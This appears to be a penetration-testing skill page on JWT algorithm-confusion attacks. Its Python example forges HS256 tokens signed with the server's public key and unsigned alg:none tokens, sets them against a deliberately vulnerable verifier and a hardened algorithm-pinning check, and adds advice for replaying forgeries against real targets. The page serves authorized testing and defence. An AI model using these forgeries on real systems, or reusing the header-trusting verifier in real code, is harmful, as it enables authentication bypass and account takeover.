exploiting-jwt-algorithm-confusion-attack

Exploiting JWT Algorithm Confusion Attack

When to Use

  • Testing APIs that authenticate with RS256 (asymmetric) JWTs to check whether the server accepts a downgrade to HS256 chosen by the token's own header
  • Assessing JWT implementations for the alg:none bypass, where the server skips signature verification for an unsigned token (including case variants such as "None" and "NONE")
  • Evaluating JWT libraries for key confusion, where the RSA public key the server already holds is reused as the HMAC secret when the header says HS256
  • Testing the kid (Key ID), jku (JWK Set URL), and x5u (X.509 URL) header parameters for injection of an attacker-controlled key or key location
  • Validating that the API server pins a specific algorithm server-side and never takes the algorithm from the JWT header

Do not use without written authorization. JWT exploitation can lead to authentication bypass and account takeover.
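The following is an added example, not code from the skill's repository, showing the two header-driven attacks above end to end with only the Python standard library: an attacker forges an HS256 token using the server's public key bytes as the HMAC secret and an unsigned alg:none token, a deliberately vulnerable verifier that trusts the header accepts both, and a hardened check that pins the algorithm rejects both before any key is touched. The PEM block is a constructed placeholder, not a real RSA key; the HMAC path never parses it, which is exactly why the attack works. `pem_secret_candidates` is a hypothetical helper that enumerates the byte-level variants of the PEM that most often decide whether the forgery matches what the server loads.

```python
import base64
import hashlib
import hmac
import json

# Constructed stand-in for the server's RSA public key as it would be served by a JWKS or
# public-key endpoint. It is NOT a real key: in the HS256 confusion attack the server only
# ever uses these bytes as an HMAC secret, so any byte string that equals what the server
# loads is enough for the demonstration.
SERVER_PUBLIC_KEY_PEM = (
    b"-----BEGIN PUBLIC KEY-----\n"
    b"MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAconstructedKeyBytes\n"
    b"-----END PUBLIC KEY-----\n"
)


def b64url(data: bytes) -> str:
    """JWT base64url encoding: URL-safe alphabet, no padding."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def _encode_part(obj: dict) -> str:
    return b64url(json.dumps(obj, separators=(",", ":")).encode())


def forge_hs256(payload: dict, secret: bytes) -> str:
    """Attacker side: sign with HS256 using the server's public key bytes as the HMAC secret."""
    signing_input = f"{_encode_part({'alg': 'HS256', 'typ': 'JWT'})}.{_encode_part(payload)}"
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{b64url(sig)}"


def forge_none(payload: dict, alg: str = "none") -> str:
    """Attacker side: unsigned token (empty signature segment). alg is a parameter because
    some parsers compare it case-insensitively, so 'None' and 'NONE' are worth trying too."""
    return f"{_encode_part({'alg': alg, 'typ': 'JWT'})}.{_encode_part(payload)}."


def pem_secret_candidates(pem: bytes) -> list[bytes]:
    """Hypothetical helper: the HMAC secret must be byte-for-byte what the server passes to
    its verify call. A missing or extra trailing newline, or CRLF line endings, is the usual
    reason an otherwise correct forgery fails, so emit the common variants to try in turn."""
    stripped = pem.rstrip(b"\n")
    return [pem, stripped, stripped + b"\n", pem.replace(b"\n", b"\r\n")]


def vulnerable_verify(token: str, public_key_pem: bytes) -> dict:
    """Server side, the bug: the algorithm is read from the untrusted header and the one
    configured key is handed to whichever algorithm the header names."""
    h, p, s = token.split(".")
    alg = json.loads(b64url_decode(h)).get("alg", "")
    if alg.lower() == "none":                      # signature check skipped entirely
        return json.loads(b64url_decode(p))
    if alg == "HS256":                             # public key reused as the HMAC secret
        expected = hmac.new(public_key_pem, f"{h}.{p}".encode(), hashlib.sha256).digest()
        if hmac.compare_digest(expected, b64url_decode(s)):
            return json.loads(b64url_decode(p))
        raise ValueError("bad HMAC signature")
    if alg == "RS256":
        # Real RSA verification would live here; the forged tokens never reach this branch.
        raise NotImplementedError("RS256 verification omitted from this demo")
    raise ValueError(f"unsupported alg {alg!r}")


def hardened_alg_check(token: str, expected_alg: str = "RS256") -> dict:
    """Server side, the fix: pin the algorithm in server configuration and reject anything
    else before the key is used at all. Only a token that passes this should go on to RSA
    verification with the pinned public key. Returns the decoded header on success."""
    header = json.loads(b64url_decode(token.split(".")[0]))
    if header.get("alg") != expected_alg:
        raise ValueError(f"alg mismatch: expected {expected_alg}, got {header.get('alg')!r}")
    return header


def demo() -> dict:
    """Forge each token type for a privilege-escalation payload and record what each verifier does."""
    payload = {"sub": "attacker", "role": "admin"}
    results = {}
    for name, tok in [("hs256", forge_hs256(payload, SERVER_PUBLIC_KEY_PEM)),
                      ("none", forge_none(payload)),
                      ("None", forge_none(payload, "None"))]:
        vuln_role = vulnerable_verify(tok, SERVER_PUBLIC_KEY_PEM).get("role")
        try:
            hardened_alg_check(tok)
            hardened = "accepted"
        except ValueError:
            hardened = "rejected"
        results[name] = (vuln_role, hardened)
    return results


if __name__ == "__main__":
    for name, (vuln_role, hardened) in demo().items():
        print(f"{name:>6}: vulnerable verifier -> role={vuln_role}; hardened check -> {hardened}")
```

Against a real target, feed each entry of `pem_secret_candidates` to `forge_hs256` and replay the results, since a forgery that is correct in every other respect will still fail if the secret differs from the server's copy by a single newline. On the defensive side the equivalent of `hardened_alg_check` in PyJWT is passing an explicit allow-list, `jwt.decode(token, key, algorithms=["RS256"])`; current PyJWT releases also refuse to use a PEM-formatted public key as an HMAC secret, so a negative result against a patched library says nothing about whether the application code itself trusts the header.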

Prerequisites

  • Written authorization specifying the target API and its JWT-based authentication as in scope
  • A valid JWT from the target API (obtained by authenticating legitimately), used as the template whose header and claims the forged tokens copy
  • The server's RSA public key, byte-for-byte as the server loads it (obtainable from its JWKS endpoint, TLS certificate, or public-key endpoint)
  • Python 3.10+ with the PyJWT, cryptography, and requests libraries
  • jwt_tool for automated JWT attack testing
  • Burp Suite with the JWT Editor extension
Installs: 32 · GitHub Stars: 6.2K · First Seen: Mar 15, 2026